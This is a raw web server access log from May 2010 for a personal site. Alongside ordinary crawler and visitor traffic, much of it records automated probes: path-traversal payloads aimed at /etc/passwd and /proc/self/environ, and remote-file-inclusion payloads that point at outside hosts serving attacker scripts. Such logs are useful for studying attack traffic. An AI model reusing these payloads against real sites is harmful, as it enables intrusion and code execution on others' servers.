111.67.9.133 - - [18/May/2010:19:00:49 -0500] "GET /logs/access_log.1273276800/*.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.823"
111.67.9.133 - - [18/May/2010:19:00:49 -0500] "GET /*.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
111.67.9.133 - - [18/May/2010:19:00:50 -0500] "GET /logs/*.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
111.67.9.133 - - [18/May/2010:19:02:35 -0500] "GET /logs/access_log.1273363200/*.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.823"
211.239.161.143 - - [18/May/2010:19:03:17 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
211.239.161.143 - - [18/May/2010:19:03:18 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
87.250.255.243 - - [18/May/2010:19:04:50 -0500] "GET /logs/access_log.1232755200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.237 - - [18/May/2010:19:07:36 -0500] "GET /logs/access_log.1216425600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.47 - - [18/May/2010:19:10:36 -0500] "GET /?S=A HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:19:15:07 -0500] "GET /logs/access_log.1167177600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.168.54.22 - - [18/May/2010:19:16:14 -0500] "GET /logs/access_log.1272844800/com_koesubmit/koesubmit.php?mosConfig_absolute_path=%20com_koesubmit../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-""libwww-perl/5.805"
69.168.54.22 - - [18/May/2010:19:16:15 -0500] "GET /com_koesubmit/koesubmit.php?mosConfig_absolute_path=%20com_koesubmit../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
69.168.54.22 - - [18/May/2010:19:16:15 -0500] "GET /logs/com_koesubmit/koesubmit.php?mosConfig_absolute_path=%20com_koesubmit../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
69.168.54.22 - - [18/May/2010:19:17:38 -0500] "GET /logs/access_log.1273363200/microcms-include.php?microcms_path=%20microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 331 "-""libwww-perl/5.805"
69.168.54.22 - - [18/May/2010:19:17:38 -0500] "GET /microcms-include.php?microcms_path=%20microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""libwww-perl/5.805"
69.168.54.22 - - [18/May/2010:19:17:38 -0500] "GET /logs/microcms-include.php?microcms_path=%20microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.250.255.243 - - [18/May/2010:19:18:34 -0500] "GET /logs/access_log.1174089600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
122.249.22.58 - - [18/May/2010:19:19:07 -0500] "GET /logs/access_log.1272844800/com_koesubmit/koesubmit.php?mosConfig_absolute_path=%20com_koesubmit../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-""libwww-perl/5.803"
122.249.22.58 - - [18/May/2010:19:19:08 -0500] "GET /com_koesubmit/koesubmit.php?mosConfig_absolute_path=%20com_koesubmit../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
122.249.22.58 - - [18/May/2010:19:19:08 -0500] "GET /logs/com_koesubmit/koesubmit.php?mosConfig_absolute_path=%20com_koesubmit../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
80.179.153.117 - - [18/May/2010:19:19:52 -0500] "GET /logs/access_log.1272844800/com_koesubmit/koesubmit.php?mosConfig_absolute_path=%20com_koesubmit../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-""libwww-perl/5.79"
80.179.153.117 - - [18/May/2010:19:19:52 -0500] "GET /com_koesubmit/koesubmit.php?mosConfig_absolute_path=%20com_koesubmit../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
80.179.153.117 - - [18/May/2010:19:19:53 -0500] "GET /logs/com_koesubmit/koesubmit.php?mosConfig_absolute_path=%20com_koesubmit../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.79"
122.249.22.58 - - [18/May/2010:19:20:15 -0500] "GET /logs/access_log.1273363200/microcms-include.php?microcms_path=%20microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 331 "-""libwww-perl/5.803"
122.249.22.58 - - [18/May/2010:19:20:16 -0500] "GET /microcms-include.php?microcms_path=%20microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""libwww-perl/5.803"
122.249.22.58 - - [18/May/2010:19:20:16 -0500] "GET /logs/microcms-include.php?microcms_path=%20microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 309 "-""libwww-perl/5.803"
80.179.153.117 - - [18/May/2010:19:20:24 -0500] "GET /logs/access_log.1273363200/microcms-include.php?microcms_path=%20microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 331 "-""libwww-perl/5.79"
80.179.153.117 - - [18/May/2010:19:20:24 -0500] "GET /microcms-include.php?microcms_path=%20microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""libwww-perl/5.79"
80.179.153.117 - - [18/May/2010:19:20:25 -0500] "GET /logs/microcms-include.php?microcms_path=%20microcms_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 309 "-""libwww-perl/5.79"
207.46.204.197 - - [18/May/2010:19:20:36 -0500] "GET /logs/access_log.1182816000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.42 - - [18/May/2010:19:23:07 -0500] "GET /logs/access_log.1271289600 HTTP/1.1" 200 669492 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:19:24:19 -0500] "GET /logs/access_log.1160611200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [18/May/2010:19:28:54 -0500] "GET /logs/access_log.1266624000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
111.89.128.186 - - [18/May/2010:19:31:46 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
111.89.128.186 - - [18/May/2010:19:31:47 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.46.195.225 - - [18/May/2010:19:35:06 -0500] "GET /logs/access_log.1208822400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [18/May/2010:19:36:46 -0500] "GET /logs/access_log.1215043200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
111.89.128.186 - - [18/May/2010:19:37:04 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
111.89.128.186 - - [18/May/2010:19:37:04 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.46.13.136 - - [18/May/2010:19:37:37 -0500] "GET /logs/access_log.1180396800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:19:38:04 -0500] "GET /logs/access_log.1217808000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [18/May/2010:19:43:48 -0500] "GET /logs/access_log.1179964800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.178 - - [18/May/2010:19:46:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:19:52:59 -0500] "GET /logs/access_log.1268870400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
58.125.181.214 - - [18/May/2010:19:57:21 -0500] "GET /logs/access_log.1265241600//bbs//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
58.125.181.214 - - [18/May/2010:19:57:21 -0500] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
58.125.181.214 - - [18/May/2010:19:57:21 -0500] "GET //bbs//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.250.255.243 - - [18/May/2010:19:57:48 -0500] "GET /logs/access_log.1156982400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.50.85.15 - - [18/May/2010:20:01:33 -0500] "GET //bbs//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
74.50.85.15 - - [18/May/2010:20:01:33 -0500] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.50.85.15 - - [18/May/2010:20:01:33 -0500] "GET /logs/access_log.1265241600//bbs//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:01 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:02 -0500] "GET /logs/access_log.1265414400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:02 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:02 -0500] "GET /logs/access_log.1262649600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.227.119.49 - - [18/May/2010:20:02:10 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
212.227.119.49 - - [18/May/2010:20:02:10 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
84.40.30.37 - - [18/May/2010:20:02:36 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:36 -0500] "GET /logs/access_log.1265414400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:36 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:36 -0500] "GET /logs/access_log.1262649600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:37 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:37 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:37 -0500] "GET /logs/access_log.1265414400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:37 -0500] "GET /logs/access_log.1262649600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:44 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:44 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:44 -0500] "GET /logs/access_log.1265414400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [18/May/2010:20:02:45 -0500] "GET /logs/access_log.1262649600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:04:04 -0500] "GET /////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:04:05 -0500] "GET /logs/access_log.1273276800%20%20/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:04:05 -0500] "GET /logs/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:04:40 -0500] "GET /logs/access_log.1273276800%20%20/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:04:40 -0500] "GET /logs/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:04:42 -0500] "GET /////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:05:24 -0500] "GET /logs/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:05:24 -0500] "GET /////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.88.4.141 - - [18/May/2010:20:05:24 -0500] "GET /logs/access_log.1273276800%20%20/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [18/May/2010:20:05:51 -0500] "GET /logs/access_log.1219536000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
38.101.148.126 - - [18/May/2010:20:06:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
111.89.128.186 - - [18/May/2010:20:07:05 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
111.89.128.186 - - [18/May/2010:20:07:05 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
38.101.148.126 - - [18/May/2010:20:07:21 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
111.89.128.186 - - [18/May/2010:20:07:47 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
111.89.128.186 - - [18/May/2010:20:07:48 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.46.195.228 - - [18/May/2010:20:09:36 -0500] "GET /logs/access_log.1163721600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [18/May/2010:20:11:49 -0500] "GET /costume/index1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
38.101.148.126 - - [18/May/2010:20:12:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [18/May/2010:20:12:23 -0500] "GET /logs/access_log.1216598400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
80.71.1.68 - - [18/May/2010:20:15:48 -0500] "GET //errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
80.71.1.68 - - [18/May/2010:20:15:48 -0500] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
208.125.112.243 - - [18/May/2010:20:17:21 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
208.125.112.243 - - [18/May/2010:20:17:22 -0500] "GET /logs/access_log.1271376000/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
208.125.112.243 - - [18/May/2010:20:17:27 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
208.125.112.243 - - [18/May/2010:20:17:58 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
208.125.112.243 - - [18/May/2010:20:17:58 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
208.125.112.243 - - [18/May/2010:20:17:58 -0500] "GET /logs/access_log.1271376000/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
208.125.112.243 - - [18/May/2010:20:18:39 -0500] "GET /logs/access_log.1271376000/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
208.125.112.243 - - [18/May/2010:20:18:39 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
87.250.255.243 - - [18/May/2010:20:18:48 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
208.125.112.243 - - [18/May/2010:20:19:57 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
208.125.112.243 - - [18/May/2010:20:20:02 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
208.125.112.243 - - [18/May/2010:20:20:09 -0500] "GET /logs/access_log.1271376000/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
87.250.255.243 - - [18/May/2010:20:24:34 -0500] "GET /logs/access_log.1244160000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.241 - - [18/May/2010:20:28:36 -0500] "GET /logs/access_log.1171238400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [18/May/2010:20:28:56 -0500] "GET /logs/access_log.1216944000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
96.61.22.254 - - [18/May/2010:20:32:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:32:36 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
87.250.255.243 - - [18/May/2010:20:32:40 -0500] "GET /logs/access_log.1251072000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
96.61.22.254 - - [18/May/2010:20:32:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:48 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:49 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:49 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:49 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:49 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:49 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:49 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:49 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:49 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:50 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:50 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
96.61.22.254 - - [18/May/2010:20:33:57 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
